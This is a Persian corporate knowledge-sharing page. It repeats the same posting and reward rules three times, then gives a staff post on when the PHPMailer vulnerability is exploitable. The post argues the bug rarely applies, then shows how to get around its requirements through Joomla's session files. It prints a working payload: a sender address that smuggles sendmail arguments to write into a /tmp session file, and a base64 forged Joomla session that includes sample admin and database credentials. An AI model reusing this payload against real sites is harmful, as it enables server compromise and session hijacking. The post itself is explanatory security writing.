پیشنهاد بهبود دهنده(× 5 امتیاز)
اگر پیشنهادی دارید ما استقبال می کنیم.
- ۱. مطالب باید در حوزه خدمات تخصصی کسب و کار گرین وب و موارد مرتبط باشد. لذا هرگونه محتوا در غیر از این زمینه تایید نخواهد شد.
- ۲. نحوه امتیازدهی به مطالب اشتراک دانش به صورت زیر است :
  - مطالب کمتر از 450 کلمه : نیمی از امتیاز
  - مطالب بیش از 450 کلمه : امتیاز کامل
- ۳. محتوای کپی شده فاقد ارزش امتیازدهی می باشد اما در صورتیکه با مطلب مفید و کاربردی در وبسایتها و شبکه های اجتماعی برخورد کردید می توانید با ذکر منبع در ابتدای مطلب، آنرا به اشتراک بگذارید. اما به مطلب کپی شده امتیازی تعلق نمی گیرد.
- ۴. هر کاربر اجازه دارد در هفته حداکثر 5 مطلب قرار دهد تا حق سایر اعضا نیز در امتیاز گیری محفوظ بماند.
- ۵. کلیه مطالب ارسال شده توسط پرسنل در یک بازه زمانی خاص و بصورت دوره ای بررسی می شوند. از یادآوری مکرر در رابطه با بررسی مطالب، خودداری نمائید.
- ۶. جوایز پشت درب ها به صورت تصادفی به کلید ها تعلق می گیرد و از این بابت کاربر حق هیچگونه اعتراضی را نخواهد داشت.
- ۷. تحویل جوایز در انتهای هر ماه توسط منابع انسانی انجام می شود.
- ۸. برخی مطالب "نیازمند اصلاحات" است. در این صورت، باید اصلاحات انجام شده و دوباره ذخیره گردد.
- ۹. برای هر محتوایی در سایت یک دسته بندی و موضوع در نظر گرفته شده است که باید در زمان درج مطلب، به آن دقت شود.
اینجانب کلیه موارد فوق را می پذیرم
اشتراک دانش(× 20 امتیاز)
دانش خود را با همکاران خود به اشتراک بگذارید.
- ۱. مطالب باید در حوزه خدمات تخصصی کسب و کار گرین وب و موارد مرتبط باشد. لذا هرگونه محتوا در غیر از این زمینه تایید نخواهد شد.
- ۲. نحوه امتیازدهی به مطالب اشتراک دانش به صورت زیر است :
  - مطالب کمتر از 450 کلمه : نیمی از امتیاز
  - مطالب بیش از 450 کلمه : امتیاز کامل
- ۳. محتوای کپی شده فاقد ارزش امتیازدهی می باشد اما در صورتیکه با مطلب مفید و کاربردی در وبسایتها و شبکه های اجتماعی برخورد کردید می توانید با ذکر منبع در ابتدای مطلب، آنرا به اشتراک بگذارید. اما به مطلب کپی شده امتیازی تعلق نمی گیرد.
- ۴. هر کاربر اجازه دارد در هفته حداکثر 5 مطلب قرار دهد تا حق سایر اعضا نیز در امتیاز گیری محفوظ بماند.
- ۵. کلیه مطالب ارسال شده توسط پرسنل در یک بازه زمانی خاص و بصورت دوره ای بررسی می شوند. از یادآوری مکرر در رابطه با بررسی مطالب، خودداری نمائید.
- ۶. جوایز پشت درب ها به صورت تصادفی به کلید ها تعلق می گیرد و از این بابت کاربر حق هیچگونه اعتراضی را نخواهد داشت.
- ۷. تحویل جوایز در انتهای هر ماه توسط منابع انسانی انجام می شود.
- ۸. برخی مطالب "نیازمند اصلاحات" است. در این صورت، باید اصلاحات انجام شده و دوباره ذخیره گردد.
- ۹. برای هر محتوایی در سایت یک دسته بندی و موضوع در نظر گرفته شده است که باید در زمان درج مطلب، به آن دقت شود.
اینجانب کلیه موارد فوق را می پذیرم
ارسال گزارشمحرمانه(× 10 امتیاز)
گزارش نقص، ایراد، روندها و فعالیت های اشتباه و ...
ارائه ایده(× 10 امتیاز)
ایده های خلاقانه خود را به اشتراک بگذارید .
- ۱. مطالب باید در حوزه خدمات تخصصی کسب و کار گرین وب و موارد مرتبط باشد. لذا هرگونه محتوا در غیر از این زمینه تایید نخواهد شد.
- ۲. نحوه امتیازدهی به مطالب اشتراک دانش به صورت زیر است :
  - مطالب کمتر از 450 کلمه : نیمی از امتیاز
  - مطالب بیش از 450 کلمه : امتیاز کامل
- ۳. محتوای کپی شده فاقد ارزش امتیازدهی می باشد اما در صورتیکه با مطلب مفید و کاربردی در وبسایتها و شبکه های اجتماعی برخورد کردید می توانید با ذکر منبع در ابتدای مطلب، آنرا به اشتراک بگذارید. اما به مطلب کپی شده امتیازی تعلق نمی گیرد.
- ۴. هر کاربر اجازه دارد در هفته حداکثر 5 مطلب قرار دهد تا حق سایر اعضا نیز در امتیاز گیری محفوظ بماند.
- ۵. کلیه مطالب ارسال شده توسط پرسنل در یک بازه زمانی خاص و بصورت دوره ای بررسی می شوند. از یادآوری مکرر در رابطه با بررسی مطالب، خودداری نمائید.
- ۶. جوایز پشت درب ها به صورت تصادفی به کلید ها تعلق می گیرد و از این بابت کاربر حق هیچگونه اعتراضی را نخواهد داشت.
- ۷. تحویل جوایز در انتهای هر ماه توسط منابع انسانی انجام می شود.
- ۸. برخی مطالب "نیازمند اصلاحات" است. در این صورت، باید اصلاحات انجام شده و دوباره ذخیره گردد.
- ۹. برای هر محتوایی در سایت یک دسته بندی و موضوع در نظر گرفته شده است که باید در زمان درج مطلب، به آن دقت شود.
اینجانب کلیه موارد فوق را می پذیرم

اشتراک دانش اشکان ابراهیمی » باگ PHPMailer چه زمانی می‌تواند بهتر به کارمان بیاید؟ (۱۳۹۵/۱۰/۱۵)

تایید شده

باگ PHPMailer چه زمانی می‌تواند بهتر به کارمان بیاید؟

این باگ در موقعیات خیلی خاص عمل می‌کند و عموماً کاربردی ندارد. به سه دلیل اساسی:

۱. کتابخانه‌ی PHPMailer بصورت پیشفرض برای ارسال ایمیل استفاده نمی‌شود. بلکه یک‌ جایگزین برای mail() PHP است. (البته در مورد سیستم‌های مدیریت محتوایی شامل Wordpress, Joomla, Drupal و.. این مورد مستثناست.)
۲. در شرایطی این آسیب‌پذیری حاکم است که ارسال کننده ایمیل در برنامه خواسته شده باشد.
۳. الزامات اکسپلویت شدن این آسیب‌پذیری سرگیجه‌آور است! (مهاجم باید مسیر کامل برنامه را بداند! و برنامه باید سطح دسترسی نوشتن در مسیرهایی خاص را داشته باشد)

اما راهکاری پیدا شده که می‌توان مورد سوم را تقریباً دور زد: استفاده از نشست‌های برنامه جهت بارگذاری فایل‌ها. (اما این مورد نیز بسته به نوع کارکرد برنامه برای نشست‌ها می‌باشد.)

یکی از این برنامه‌ها، سیستم مدیریت محتوای Joomlaست. از سازوکار مدیریت نشست آن در جهت نائل شدن به مقاصد خود می‌شود استفاده کرد :

مقاصد خود می‌شود استفاده کرد :

$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0 some"@email.com';

$msg_body = 'joomla|s:1572:"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo4O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTQ4MzM4ODA2MztzOjQ6Imxhc3QiO2k6MTQ4MzM4ODEzNjtzOjM6Im5vdyI7aToxNDgzMzg4MzY1O31zOjU6InRva2VuIjtzOjMyOiJuWmx5ZFdYMUN4M1VnbjhRbWNLN0RnRGJNTkZBMVFkeSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo1OiJzZXR1cCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJvcHRpb25zIjthOjE1OntzOjk6InNpdGVfbmFtZSI7czoxNDoicnVzc2lhLXJlbGF0ZWQiO3M6MTE6ImFkbWluX2VtYWlsIjtzOjEyOiJhc2RAYXNkcy5jb20iO3M6MTA6ImFkbWluX3VzZXIiO3M6NToiYWRtaW4iO3M6MTQ6ImFkbWluX3Bhc3N3b3JkIjtzOjI4OiJydXNzaWEtcmVsYXRlZHJ1c3NpYS1yZWxhdGVkIjtzOjEzOiJzaXRlX21ldGFkZXNjIjtzOjA6IiI7czoxMjoic2l0ZV9vZmZsaW5lIjtpOjA7czo4OiJsYW5ndWFnZSI7czo1OiJlbi1VUyI7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJkYl90eXBlIjtzOjY6Im15c3FsaSI7czo3OiJkYl9ob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo3OiJkYl91c2VyIjtzOjQ6InJvb3QiO3M6NzoiZGJfcGFzcyI7czoxMjoibXktc2VjcmV0LXB3IjtzOjc6ImRiX25hbWUiO3M6NDoidGVzdCI7czo2OiJkYl9vbGQiO3M6NjoiYmFja3VwIjtzOjk6ImRiX3ByZWZpeCI7czo2OiJwa2M2cV8iO319fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=";';